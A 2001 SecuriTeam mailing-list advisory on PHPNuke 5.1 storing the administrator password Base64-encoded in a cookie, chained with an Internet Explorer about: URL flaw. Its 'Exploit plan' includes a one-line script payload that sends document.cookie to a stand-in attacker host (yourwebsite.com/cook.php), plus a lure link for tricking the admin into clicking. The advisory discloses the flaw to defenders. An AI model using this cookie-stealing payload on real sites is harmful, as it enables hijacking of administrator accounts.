[UNIX] PHPNuke Admin Password Can Be Stolen

From: support@securiteam.com
Date: 11/25/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] PHPNuke Admin Password Can Be Stolen
Message-Id: <20011125130805.4E536138BF@mail.der-keiler.de>
Date: Sun, 25 Nov 2001 14:08:05 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  PHPNuke Admin Password Can Be Stolen
------------------------------------------------------------------------

SUMMARY

Vulnerabilities in PHPNuke expose the administrative password. The
vulnerability lies in PHPNuke's insecure storage of the administrator
password in a cookie.

DETAILS

Vulnerable systems:
PHPNuke version 5.1

To successfully exploit this vulnerability you will need to rely on two
other vulnerabilities:

Password BASE64 encoding:
The administrator login/password pair is stored in a cookie like this:
---snip---
lang
english
isecurelabs.com/
0
725504896
29523774
551579360
29450340
*
admin
QWRtaW46TmljZV9Ucnk6DQo=
isecurelabs.com/
0
1451582336
29456384
3432929360
29450340
*
---snip---

Furthermore, the administrator password is BASE64 encoded, making it very
easy to decode.

Example:
QWRtaW46TmljZV9Ucnk6DQo= is Admin:Nice_Try:

You can verify this by using the following PHP script:
 <http://www.isecurelabs.com/base64.php>
http://www.isecurelabs.com/base64.php

About:URLS security vulnerability:
As we reported in a previous article:
<http://www.securiteam.com/windowsntfocus/6I00D1535I.html> Microsoft IE
Cookies Exposure via 'About:' URLS, a vulnerability in Internet Explorer
allows extraction of cookies stored on the remote connecting client (even
if they are not from our cookie domain).

Exploit plan:
First create a php script that can gather getenv("QUERY_STRING") in a
file. Then create this kind of link and force the PHPNuke administrator to
follow it:

[a href="about://www.nuked-site.com/
[script]window.open("http://www.yourwebsite.com/cook.php?"+document.cookie);[/script]"] Hey,this is the last Bind9 remote root exploit ![/a]
(replace [ & ] by )

Where:
www.nuked-site.com is the site that you want to get cookie of.
www.yourwebsute.com is the site that will receive the cookie thru the
cook.php script.

If the nuked site's admin follow this link, he will send to your script
his cookie with the Base64 encoded password. Then you just have to decode
it.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:aurelien.cabezon@iSecureLabs.com> Cabezon Aurelien.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • Re: [Full-disclosure] OWASP LiveCD Vulnerabilities
    ... THIS IS A PRETTY FUNNY ADVISORY ... Super Wowzer Hacker Team - Professional Vulnerability Assessments ... create a clickable link back to our uberhawtness security page and include ... Cookie harassing ...
    (Full-Disclosure)
  • [NEWS] Ikonboard Cookie Filter Vulnerability
    ... Ikonboard Cookie Filter Vulnerability ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... It sets the filename, runs it through the filter, and opens it. ...
    (Securiteam)
  • SecurityFocus Microsoft Newsletter #165
    ... Tenable Security ... distribute, manage, and communicate vulnerability and intrusion detection ... Microsoft Internet Explorer MHTML Forced File Execution Vuln... ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #174
    ... This issue sponsored by: Tenable Network Security ... the worlds only 100% passive vulnerability ... MICROSOFT VULNERABILITY SUMMARY ... Novell Netware Enterprise Web Server Multiple Vulnerabilitie... ...
    (Focus-Microsoft)
  • [NT] Cumulative Security Update for Internet Explorer (MS04-038)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... CSS Heap Memory Corruption Vulnerability, ... Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 ...
    (Securiteam)